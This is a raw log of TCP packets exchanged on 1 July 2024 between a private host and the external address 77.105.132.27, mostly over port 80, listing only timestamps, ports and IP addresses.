Jul 1, 2024 09:16:13.399178982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399190903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399210930 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399235964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399236917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399249077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399260044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399293900 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399312019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399329901 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399359941 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399384975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399396896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399408102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399420023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399422884 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399431944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399439096 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399444103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399455070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399470091 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399492025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399513006 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399621964 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399632931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399667025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399682999 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399766922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399780035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399790049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399801016 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399811983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399821997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399821997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399833918 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399843931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399854898 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399867058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.399867058 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399892092 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.399919033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400108099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400216103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400232077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400243044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400253057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400258064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400264978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400274992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400285959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400290012 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400298119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400309086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400321007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400333881 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400356054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400568962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400580883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400590897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400602102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400626898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400645971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400691032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400702000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400712967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400723934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400732040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400748968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400768995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400830030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400840998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400851965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400863886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400867939 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400878906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400891066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400897026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400901079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.400923967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.400943995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.404201031 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.404373884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.404386044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.404443979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.404704094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.404716015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.404750109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.404856920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.404907942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.404932022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.404969931 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.405138969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.405179024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.405291080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.405334949 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.405428886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.405467033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.405544043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.405564070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.405580044 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.405606985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428391933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428410053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428421974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428433895 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428446054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428457975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428457022 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428493023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428513050 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428530931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428544998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428560019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428570986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428580999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428584099 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428594112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428599119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428606987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428617954 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428617954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428631067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428643942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428647041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428654909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428668022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428678036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428685904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428689957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428699970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428704977 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428711891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428725958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.428730011 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428742886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.428762913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.442392111 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.447309971 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.492569923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.493701935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.493712902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.493786097 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.496942043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.496953964 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.497009039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.502945900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.502962112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.503029108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.508851051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.508868933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.508881092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.508924961 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.508950949 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.513577938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.513593912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.513632059 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.513658047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.518538952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.518554926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.518609047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.523051977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.523070097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.523082018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.523125887 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.523153067 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.527852058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.527867079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.527925014 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.532264948 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.532279015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.532288074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.532325029 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.532346964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.536528111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.536542892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.536577940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.540343046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.540358067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.540410042 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.544172049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.544189930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.544198990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.544229031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.544255018 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.548017979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.548032999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.548073053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.551784992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.551803112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.551814079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.551843882 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.551861048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.555505037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.555521011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.555571079 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.558876038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.558891058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.558901072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.558928967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.558945894 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.562267065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.562283039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.562319994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.565320969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.565340996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.565352917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.565376043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.565418959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.568377972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.568394899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.568424940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.568440914 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.571799040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.571814060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.571825027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.571868896 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.571892977 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.574414015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.574426889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.574457884 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.577235937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.577250004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.577261925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.577289104 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.577311039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.579905033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.579919100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.580224991 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.582581043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.582596064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.582604885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.582648993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.582665920 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.585221052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.585233927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.585278988 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.587651014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.587663889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.587675095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.587713957 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.587733984 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.590215921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.591257095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.591269970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.591312885 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.593564034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.593575954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.593622923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.595837116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.595850945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.595860004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.595916986 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.598042965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.598057985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.598076105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.598098993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.598124981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.600222111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.600238085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.600275040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.602258921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.602272987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.602315903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.604269028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.604283094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.604310036 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.604327917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.606319904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.606336117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.606365919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.606393099 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.608122110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.608136892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.608149052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.608175993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.608196020 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.610018969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.610033035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.610079050 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.611819029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.611834049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.611866951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.611884117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.613612890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.613627911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.613639116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.613686085 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.615268946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.615283012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.615333080 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.617000103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.617013931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.617046118 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.617069960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.618622065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.618637085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.618645906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.618683100 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.620213985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.620248079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.620297909 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.621808052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.621822119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.621850014 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.621872902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.623445988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.623460054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.623497009 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.624849081 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.624862909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.624872923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.624886990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.624906063 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.626672983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.626688004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.626723051 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.627924919 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.627938986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.627949953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.627959013 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.627985954 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.629057884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.629071951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.629096985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.629122972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.630377054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.630389929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.630399942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.630431890 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.630450964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.631731987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.631750107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.631761074 CEST	80	49752	77.105.132.27	192.168.2.4
